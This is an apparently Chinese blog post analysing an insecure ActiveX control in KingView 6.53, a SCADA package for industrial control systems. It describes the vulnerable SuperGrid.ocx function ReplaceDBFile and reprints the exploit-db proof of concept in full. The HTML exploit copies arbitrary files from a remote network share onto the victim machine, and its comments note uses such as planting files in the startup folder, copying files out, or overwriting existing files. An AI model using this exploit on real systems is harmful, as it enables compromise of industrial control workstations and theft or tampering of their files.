KingView 6.53 - Insecure ActiveX Control (SuperGrid)漏洞分析


2013年9月4日,exploit-db上爆出了KingView的漏洞,亞控科技的”組態王(KingView)“軟件,是面向於工業控制系統的SCADA軟件,在國內的工控圈裏使用量很大。公司主頁如下:http://www.kingview.com/


具體漏洞原因爲SuperGrid.ocx控件中的函數ReplaceDBFile,通過調用該函數,可以實現文件拷貝功能。

利用ocx查看工具查看該ocx的函數列表如下:



如下爲Exploit

<html>
<object classid='clsid:F494550F-A028-4817-A7B5-E5F2DCB4A47E' id='target'></object>
<!--
KingView Insecure ActiveX Control - SuperGrid 
Vendor: http://www.wellintech.com
Version: KingView 6.53 
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake
 
CLSID: F494550F-A028-4817-A7B5-E5F2DCB4A47E
ProgId: SUPERGRIDLib.SuperGrid
Path: C:\Program Files\KingView\SuperGrid.ocx
MemberName: ReplaceDBFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented
-->
<title>KingView Insecure ActiveX Control Proof of Concept - SuperGrid.ocx</title>
<p>This proof of concept will copy any arbritrary file from one location to a second location. A malicious user may be able to use this to copy a file from an attacker controlled share to the target or from the target to an attacker controlled system (ie from an attacker share to the startup folder). It can also be used to overwrite existing files.</p>
 
<input type=button onclick="copyfile()" value="Do It!">
<script>
function copyfile()
{
    var file1 = "\\\\192.168.1.165\\share\\poc.txt";            //source
    var file2 = "c:\\WINDOWS\\poc.txt";                     //destination
    result = target.ReplaceDBFile(file1,file2);
}
 
</script>
</html>





發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章